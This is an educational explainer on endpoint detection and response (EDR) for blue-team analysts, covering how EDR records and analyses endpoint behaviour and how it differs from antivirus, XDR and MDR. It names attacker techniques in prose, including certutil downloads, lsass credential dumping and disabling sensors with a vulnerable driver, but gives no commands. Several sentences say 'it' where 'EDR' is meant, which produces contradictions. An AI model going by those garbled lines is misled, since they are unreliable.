Detection Engineering

What Is EDR? Endpoint Detection and Response

Endpoint detection and response (EDR) is a security technology that continuously records activity on endpoints; laptops, servers, and workstations and analyzes it for signs of malicious behavior, and gives analysts the tools to investigate and respond.

14 min read·Updated June 2026·MITRE ATT&CKincident responseEndpoint SecurityBlue TeamDetection EngineeringThreat DetectionCCDL1 RelevantCCDL2 Relevant

An analyst gets an alert at 2 a.m. Nothing is obviously wrong. The antivirus is quiet, no known-bad file, no flagged signature. But the EDR console shows a process tree that should not exist: Microsoft Word spawned PowerShell, PowerShell launched certutil to download a file, and a few seconds later something tried to read the memory of lsass.exe, the process that holds Windows credentials. Every one of those programs is legitimate. The sequence is not. The analyst clicks one button, isolates the machine from the network, and the intrusion stops there, at one workstation, before it became a domain-wide ransomware event.

Traditional antivirus would have seen nothing, because nothing in that chain is a known-bad file. EDR caught it because it was not looking for files. It was watching behavior, recording every action on the endpoint, and it recognized the shape of an attack.

This guide covers what EDR is and where it came from, why signature antivirus stopped being enough, how EDR works stage by stage, what it actually collects and what it can do in response, how it compares to EPP, MDR, and XDR, where it fits in a SOC, and its real limitations. It is written for blue teamers who live in the EDR console: SOC analysts, incident responders, and threat hunters.

What is EDR?

Endpoint detection and response (EDR) is a security technology that continuously records activity on endpoints, laptops, servers, and workstations, analyzes it for signs of malicious behavior, and gives analysts the tools to investigate and respond. The endpoint is where most attacks ultimately execute: where the malicious code runs, where credentials are stolen, where ransomware encrypts. EDR is the camera and the controls in that room.

The term comes from Gartner analyst Anton Chuvakin, who coined "endpoint threat detection and response" in 2013 to name a new category of tools focused on detecting and investigating suspicious activity on hosts, as opposed to just blocking known malware. The name shortened to EDR, and the category became standard.

The shift it represents is from prevention alone to detection and response. Prevention assumes you can stop every threat at the door. EDR assumes some will get through, and makes sure that when they do, you can see what they did and stop them fast. That assumption, that breaches are inevitable and visibility is the real defense, is why EDR became foundational to modern security operations.

Why signature antivirus is not enough

Traditional antivirus, the original endpoint protection, works by signatures: it compares files against a database of known-bad hashes and patterns. If the file matches, it blocks it. This is fast and effective against known, file-based malware, and it is still worth having. But it has two structural blind spots.

It only knows what it has seen before. A brand-new malware variant, or one repacked to change its hash, has no signature yet. Signature antivirus cannot catch what is not in its database.

It looks at files, not behavior. Modern intrusions increasingly use no malicious file at all. "Living off the land" attacks abuse legitimate, already-installed tools, PowerShell, certutil, wmic, psexec, to do their work. Every binary is trusted and signed by Microsoft. To a file scanner, nothing is wrong. The attack lives in the sequence of actions, not in any single file.

EDR closes both gaps by changing what it watches. Instead of asking "is this file known to be bad," it asks "is this behavior suspicious." A Word document spawning PowerShell that reaches into credential memory is a malicious pattern regardless of which files are involved, and that is exactly what EDR is built to see.

How EDR works

EDR · behavioral detection chain

Every process is legitimate. The sequence is not.

What a file scanner sees as four trusted programs, EDR sees as one malicious chain.

PARENT

winword.exe

User opens a document. Signed and trusted.

→

SUSPICIOUS CHILD

powershell.exe

Word spawns PowerShell. Office apps rarely do this.

→

DOWNLOAD

certutil.exe

PowerShell calls certutil to pull a payload from the web.

→

CREDENTIAL THEFT

lsass.exe access

Memory of lsass is read to steal credentials.

MITRE T1003

Response · host isolation One click cuts the endpoint off the network. The intrusion stops at one workstation, before it becomes a domain-wide event.

EDR runs as a lightweight agent on every endpoint, streaming telemetry to a central platform that analyzes it and presents it to analysts. The work happens in four continuous stages.

Stage	What happens
Collect	The agent records endpoint activity in detail: process launches, file changes, registry edits, network connections, and user actions
Detect	The platform analyzes that telemetry for malicious behavior, using behavioral analytics, threat intelligence, and detection rules mapped to known attacker techniques
Investigate	Analysts get the full context: a process tree, a timeline, and the chain of events, so they can confirm what happened and how far it went
Respond	Analysts (or automated rules) contain and remediate: isolate the host, kill a process, quarantine a file, or roll back changes

Collection is the foundation. The agent continuously logs what happens on the device and retains it, which means even an attack that is not detected in the moment leaves a record an analyst can reconstruct later. This recorded history is what separates EDR from a simple alarm.

This matters because attackers are not always caught in the moment they strike. Mandiant's M-Trends 2026 report puts the global median dwell time, the gap between an intrusion and its detection, at 14 days. When detection comes late, that recorded history is what lets an analyst reconstruct those two weeks: what the attacker touched, which accounts they used, what they took, and whether they are still inside. Without the recording, a late-discovered breach is a mystery.

Detection is where it earns its keep. Rather than matching signatures, it looks for behavior: anomalies against a baseline, sequences that match known adversary techniques, and indicators pulled from threat intelligence. Many of its detections are mapped to MITRE ATT&CK, the framework that catalogs how attackers actually operate, so an alert says not just "suspicious" but "this looks like credential dumping."

Investigation turns an alert into understanding. Because the agent recorded everything, the analyst can pull up the full process tree, see what the suspicious process did before and after, trace it back to its origin, and decide whether it is a real attack or a false positive. This context is what makes triage possible at speed.

Response is the "R" that antivirus never had. From the console, an analyst can isolate the endpoint so it can talk only to the EDR platform, kill the malicious process, delete or quarantine files, and on many platforms roll the machine back to a clean state. The most important of these is host isolation, because it stops an active intrusion from spreading while the investigation continues.

What EDR collects

Its power comes from the breadth of what it records. A typical agent captures:

Process activity. Every process that launches, its command line, and its parent, which is how the Word-spawns-PowerShell chain becomes visible.
File activity. Files created, modified, deleted, or executed, the trail ransomware and droppers leave.
Registry and configuration changes. The persistence mechanisms attackers use to survive a reboot.
Network connections. Where the endpoint is talking, which surfaces command-and-control beaconing and data movement.
User and logon activity. Who logged in, when, and from where, which exposes account misuse and lateral movement.
Memory activity. What is running in memory, where fileless attacks and credential theft live.

Together these become the indicators of compromise (IOCs) and behavioral signals that detection runs on, and the evidence an investigation is built from.

A concrete example makes the value clear: when a process reads the memory of lsass.exe to steal credentials, the agent records the access, recognizes it as the credential-dumping technique cataloged in MITRE ATT&CK as T1003, and raises an alert tied to that specific technique. The same telemetry that fires the alert later proves exactly which account was exposed and when, which is the difference between guessing at the impact and knowing it.

EDR vs EPP vs MDR vs XDR

The endpoint security market is full of three-letter acronyms that overlap. Here is how they actually relate.

Term	What it is	Scope
EPP (Endpoint Protection Platform)	Prevention: antivirus, anti-malware, firewall. Blocks known threats at the endpoint	Endpoint, prevention
EDR (Endpoint Detection and Response)	Detection, investigation, and response on the endpoint. Catches what prevention misses	Endpoint, detection + response
XDR (Extended Detection and Response)	EDR extended across network, cloud, email, and identity, correlating threats across all of them	Whole environment
MDR (Managed Detection and Response)	EDR or XDR run for you by an external SOC, 24/7	A service, not a tool

The relationships in plain terms:

EPP and EDR are complementary, not competing. EPP blocks the known threats so EDR analysts are not buried in noise; it catches the unknown and the behavioral. Most modern endpoint suites bundle both.
XDR is EDR widened. It takes the same detect-investigate-respond model and applies it across more than the endpoint, correlating an endpoint alert with a suspicious login or a network anomaly to see the whole attack. The trade is complexity and integration effort.
MDR is a staffing answer, not a technology. It is only as good as the people watching it. MDR is buying that team: a provider runs detection and response on your behalf, around the clock. Organizations without a 24/7 SOC use it to get coverage they cannot staff.

Where EDR fits in the SOC

It is rarely an island. In a working security operation it is one feed among several, and its real value shows up in how it connects to the rest.

Those alerts flow into a SIEM, where they are correlated with logs from the network, identity systems, and cloud, so an analyst sees the endpoint event in context rather than alone. When an alert is confirmed, EDR is the primary tool for incident response: it provides the timeline of what the attacker did and the controls to contain it. Its recorded telemetry is also the hunting ground for proactive threat hunting, where analysts search the endpoint history for the subtle attacks no alert fired on. And it is the natural enforcement point for automated response, killing a process or isolating a host the moment a high-confidence detection lands.

The constant across all of these is the analyst. EDR surfaces the process tree; a person decides whether it is an attacker or an administrator doing something unusual. The tool generates the signal. The skill is reading it.

The limitations of EDR

It is powerful, not magic, and a defender should know where it falls short.

It needs people. The tool generates alerts and context, but someone has to triage, investigate, and decide. An EDR with no one watching it is an expensive log collector. This is the gap MDR exists to fill.
Attackers target it. Mature adversaries attempt to disable, blind, or bypass the EDR agent before they act, using techniques such as loading a vulnerable signed driver to unload the sensor from the kernel. Tampering protection and monitoring the agent's own health matter.
Coverage has gaps. An agent has to be installed to see anything. Unmanaged devices, IoT, and systems that cannot run an agent are blind spots, which is part of why XDR and network monitoring exist.
Tuning is constant. Out of the box, EDR can be noisy, flagging legitimate administrative tools that happen to look like attacks. Reducing false positives without suppressing real detections is ongoing work, not a one-time setup.

None of these are reasons to skip EDR. They are reasons to staff and run it properly.

Getting started with EDR

If you are building the skill, the work is in the telemetry.

Learn the process tree. Understand parent-child process relationships and what normal looks like, so an abnormal chain like Office spawning a script interpreter jumps out.
Map detections to ATT&CK. Learn the common attacker techniques, credential dumping, persistence, lateral movement, so an EDR alert means something to you.
Investigate a real detection. Take an alert and work it end to end: what fired, what the process did, where it came from, whether it is real.
Practice the response decision. Know when to isolate, when to kill, and when to keep watching to learn more.

The bottom line

EDR is the shift from blocking known threats to recording everything and catching attacks by their behavior. It watches every process, file, and connection on the endpoint, recognizes the patterns of an intrusion that signature antivirus cannot see, and gives an analyst the context to investigate and the controls to contain, the host isolation that turns a breach into a contained incident.

It is not a replacement for prevention, and it is not autonomous: EPP still blocks the known, XDR widens the view, MDR supplies the staff, and a human still has to read the process tree and make the call. The constraint, as always, is the analyst who can tell an attacker from an administrator.

Frequently asked questions

What is EDR in simple terms?

EDR (endpoint detection and response) is software that continuously records what happens on computers and servers, watches that activity for signs of an attack, and lets security teams investigate and shut threats down. Think of it as a security camera and an emergency stop for every endpoint, catching the threats that antivirus misses.

What is the difference between EDR and antivirus?

Antivirus blocks known malware by matching files against a database of signatures. EDR watches behavior instead, so it can catch new, unknown, and fileless attacks that use legitimate tools and leave no recognizable file. Antivirus prevents the known; it detects and responds to the unknown. They work best together.

What is the difference between EDR and XDR?

EDR focuses on the endpoint: laptops, servers, and workstations. XDR extends the same detect-investigate-respond model across more layers, including network, email, cloud, and identity, and correlates signals between them. XDR gives a broader view at the cost of more integration; it is focused and is often the core that XDR is built on.

What is the difference between EDR and MDR?

EDR is a technology you deploy and operate. MDR (managed detection and response) is that capability delivered as a service: an external team runs the detection and response for you, 24/7. Organizations that lack the staff to watch one around the clock use MDR to get that coverage.

Can EDR stop ransomware?

EDR can detect and stop many ransomware attacks before they spread, by recognizing the behaviors that precede encryption, credential theft, lateral movement, mass file changes, and isolating the host. It is one of the most effective controls against ransomware, but only when someone acts on its alerts or automated response is configured.

How do I start a career working with EDR?

Learn how processes work on Windows and Linux and what a normal process tree looks like, then study common attacker techniques through MITRE ATT&CK. Practice investigating real endpoint detections in hands-on labs, tracing an alert from the first suspicious process to the full attack chain, to build the triage skills SOC roles test for.